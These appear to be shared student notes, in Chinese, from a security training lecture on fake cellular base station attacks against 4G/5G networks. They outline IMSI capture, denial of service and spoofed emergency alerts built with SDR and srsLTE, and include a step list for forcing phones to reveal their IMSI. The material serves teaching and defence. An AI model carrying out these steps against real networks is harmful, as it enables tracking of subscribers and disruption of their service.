# 7/31 關鍵基礎設施 :::success 主題 : 偽造基地台對4G/5G安全的影響 >[name=臺灣科技大學資訊工程系 鄭欣明 副教授] ::: # [Demo影片](https://www.youtube.com/watch?v=EP1PnzMUaCg) [TOC] ## 什麼是偽造基地台 - 惡意AP (RogueAP) - 用值得信任的名字作為SSID - 騙工作人員 - 可以直接取得**未加密**的內容 - 釣魚、社交工程 <!-- 感覺待會會出現一堆 AIS3-Staff --> <!-- 用重複的SSID來騙人連上是還蠻常出現的手法w --> <!--不然就是網卡爆密碼--> <!-- WPA 還是要 crack? --> <!--應該說理論上都算crack,只是不用爆--> ## Outline - Cellular network - Security issues - Rogue base station attacks - isolated rogue bs attack - relay attack - overshadowing attack - Implementation of Rogue BS Attack - privacy attack - availability attack - spoofing attack - Demo - possible rogue base station attack in 5G - Conclusion ## Cellular Network Evolution Tracks | | 2G | 2.5G | 3G | 3.5G | 4G | 4.5G | 5G | | --- | --- | --- | --- | --- | --- | --- | --- | | 3GPP | GSM | GPRS/EDGE | UMTS/WCDMA :arrow_right: HSDPA | HSPA+ | LTE | LTE-A | New Radlo(NR) | | 3GPP2 | IS-95 | null | CDMA EV-DO | :arrow_right: | UMB(withdraw) | null | null | <!-- 上面的表格到底發生什麼事w --> <!-- 麥克風二度死亡 才 15 分鐘 :thinking: --> <!-- mic 在他手上都有一種魔力誒 --> <!-- 一直被消音(笑) --> Evolution for 3GPP ## 5G New Radio - Network Slicing - Software-defined architecture - activate different components and functionalities to serve service with specific QoS requirement > 虛擬化 (NFV/SDN) > 傳輸前先溝通過很多東西 > 手機即使沒使用也會向基地台傳輸很多的協定 - circuit switch v.s. packet switch - circuit switch - 拉專線(一人一條) - packet switch - 全部通路大家一起用 - 不同的服務會經過 network 中不同的節點 - e.g. 三樓還債, 五樓借錢 - 減少無謂的 latency - 每個節點都用虛擬化 ## 5G-NR NG-RAN gNB - Funcition split of gNB-CU and gNB-DU - Various Options - Introdution of Virtualization Technology - Router 內也虛擬化 5G: **把軟體化技術投入行動傳輸** ## Security Issues in Cellular Networks - Mutual authentication - Wireless medium is accessible for everyone in the vicnity - Identifiers can be easily forged - User authentication from network provider - accounting, authorization, and the association of data sessions to a legal person. - Network authentication from user - Network authetication for traffic confidentiality - GSM by faking the identity of a legitimate network > 我已經講了半小時了,真的超好混的 呵呵呵 > [name=鄭欣明] > 全世界很少有像中華電信一樣的電信公司 > 中華電信每年虧錢都沒有差 他們有一個 buffer 只要不要超過就好了 > [name=鄭欣明] ## Authentication and Key Agreement (AKA) in 4G ![](https://i.imgur.com/uORWY0D.png) > 這個細節大家可以不用看,我也懶得講 > [name=鄭欣明] > 雙證件是第一步的驗證 > SIM 卡有金鑰 > 簡單來說就是兩邊互相算一下彼此之間是不是那個擁有key的人 ## AKA with keys in 4G > 講解加密技術與金鑰交換原理,各位密碼學高手可以自行研究 - After AKA - Intergrity... ## Implementation of Rogue Base Station attack - Software Defined Radio (SDR) with GNU radio - a free software development tookit - provides signal processing blocks - 只要在硬體上以軟體實現某協定,那該無線電硬體就會變成該協定的硬體 - Low-cost external RF hardware - USRP by ettus research/NI - Opensource Software - 2G: openBTS - 3G: openBTS-UMTS, Osmocon - 4G: OAI, srsLTE, NextEPC - 5G: free5GC - Implementation of rogue base is possible - Very cheap comparing with the .... - Challenges - Require both telecom knowledge ... ## Classifications of Attacks - Isolated Rouge BS Attack - The rogue BS cannot connect to the operational core network - Leverage the procedure before AKA - Leverage the unencrypted messages > 聽附近基地台的參數並模仿, 且將 power 調到最大, 藉此騙取使用者連到假基地台 > 手機會自行選擇附近訊號較強的基地台進行連線 > 交換加密前的 communication 是沒加密的 ```sequence Victim UE -> Routgue BS: Connected Victim UE --> Operational BS : Disconnected Operational BS -> MME/AMF: ``` - Relay and Man-in-the-middle Attack - New style of attacks - very difficult to implement Victim UE <---> **Rogue BS** <---> **Malicious UE** <---> Operational BS <---> MME/AMF ## implementation difficulty of relay - overshadow the legitimate signal - tightly time-synchronize with downlink physical channel - leverage the synchronization signals - 3 dB power difference (RBS: 35dB) ## Isolated rogue base station attacks - against privacy - retrieve IMSI (International mobile subscriber identity) of UE/IoT devices - unique ID stored in SIM card - against availability - DoS(Denial of Service) of a particular IMSI - against authentication - spoofing of broadcasted system information ## procedures TAU (Tracking Area Update) system/MIME ... - Attach procedo(? > 我們覺得為了測試買一台~~間~~華為很浪費錢 > [name=鄭欣明] ## spoofing wireless emergency alerts attack - Via LTE Commercial Mobile Alert Service - Japan: ... - presidential alerts - president to all of the united states - ... ## Spoofing WEA Attack > 偽造國家級警報 > (假的武漢肺炎警報 圖) > 看不出來是假的 > 基本上是對沒有加密的信令去做攻擊 ## AKA in 5G > 基本上會對一些4G沒加密的信令加密,但還在討論哪些需要加密,哪些不用,減少許多上述的攻擊 > private key ## Discussion - digitally signing broadcast messaged - each operational bs has ... - ... ## Conclusion - Rogue base station attack is possible for academic researchers and of cource for the adversary - cheap - easy to deploy - portable - Detection and prevention or attack is necessary - Modification on protocols - Protocol in 5G similar to 4G - Lots of vulnerabilities exist ## 實作 - live demo - live install ### 4G/LTE Architecture > 高手幫補一下圖 > S1-U: 直接傳過去,比較快 (eNodeB <-> SGW) > ![](https://i.imgur.com/fQhCW6c.png) > ![](https://i.imgur.com/hf3bub3.png) <!--窩簡單重畫一遍--><!--666--> ## Isolated Rogue BS Attacks - The Rogue BS cannot connect to the operational Core network - Leverage the procedure before AKA - Leverage the unencrypte messages > 好像上面有了 > 各位當複習 > ?! 上課沒在聽lol > [#Classifications-of-Attacks](#Classifications-of-Attacks) > 只要信令的規格相符,手機就會接收 > 詳情請見公開[規格書](https://www.etsi.org/deliver/etsi_ts/136300_136399/136331/15.03.00_60/ts_136331v150300p.pdf) - 規格 - ETWS: 日規 - CMAS: 美規(台灣用美規) ## IMSI Capturer and DoS Attack ![](https://i.imgur.com/WbV1Um0.png) - Step 1 : Mimic neighboring operational BSs - Collect the information from neighboring legitmate BSs - MCC(Mobile Country Code) - MNC(Mobile Network Code) - 01 92(中華) 97 - TAC(Tracking Area Code) > 用這三組可以查到現在連的是哪個基地台 - Use stronger transmission power - Ensure that victim can receive - Step 2 : Trigger UE to perform TAU procedure using GUTI - Change TAC of rogue Base Station - Victim will misunderstand that it enter a new TA and perform TAU procedure - Step 3 : Feedback a TAU Reject - EMM Cause #9: UE idenitty cannot be derived by the network - UE will delete visited TA list and GUTI and enter to "EMM-DEREGISTERED" state - Step 4: UE performs Attach procedure using IMSI - Step 5: ... https://hackmd.io/@jed/ais3_srslte [高清Demo](https://www.youtube.com/watch?v=EP1PnzMUaCg) <!-- 轉換戰場 --> <!--空的? 沒錯--> ## 實作 srsLTE > https://github.com/srsLTE/srsLTE > 使用Ubuntu環境 > USRP 板 (USD),千萬不要 clone,有打包好的 binary > 沒版子不能裝 > 建議用中華、遠傳、台灣大的頻段(band3),另外兩家的是只用band7我們的客家天線不支援 ``` sudo add-apt-repository ppa:ettusresearch/uhd sudo apt-get update sudo apt-get install libuhd-dev libuhd003 uhd-host ``` <!-- Ubuntu 20.04?--> <!-- 有人知道李登輝GG了嗎? --> <!--以下開放上香(做個紀念)--> <!-- 昨天晚上7:20左右 \|/--> <!-- \|/ --> <!--RIP--> <!-- \|/ --> <!-- \|/ --> <!-- \|/ --> <!-- RIP QQ --> <!-- BTW 不知道為啥 arch 官方 repo 有這東西的 binary --> <!-- 有人也用 arch 的嗎 <3 --> <!-- 剛剛查了一下 ubuntu 19.10+ 的捧由也可以直接裝 --> <!-- 全世界最大的程式工程師的線上交友平台的程式碼倉庫的程式碼 --> <!-- 上線啦 --> <!-- 字超小--> <!-- 求解這堂課484只給關鍵基礎設施的人上? 我來AIS3也想好好上課QQ--> <!-- 如果是的話拜託設備給多一點 :silly: --> <!--你可以過來一起demo--> <!-- 求樓上位置--> <!--F-10這邊有多的位置--><!--嗯?我看過去是滿位 我在你的左後方 XD--> <!--你看錯了人啦 lol--> <!--OK >< --> <!--一塊板子四萬多我們買不了太多QQ,所以給關鍵基礎比較多,可以等安裝完再過去那些位子一起玩--> <!-- 沒問題 der,只是太習慣自己裝自己玩,跟別人擠反而不太自在 :silly: --> <!-- 之後有錢買顆 SDR 自己玩好了 --> <!-- 現在才看到客家天線 lol --> <!-- 紫色框框是 terminal 哦! --> <style> .navbar-brand > span.hidden-xs { color: transparent; } .navbar-brand > span.hidden-xs:before { background-image: url(https://ais3.org/img/AIS3logo.png); background-repeat: no-repeat; content: '  '; background-size: contain; } .navbar-brand > span.hidden-xs:after { margin-left: -3.8em; content: '關鍵基礎設施'; color: #4b4645; } .navbar-brand > .fa-file-text { display: none; } </style>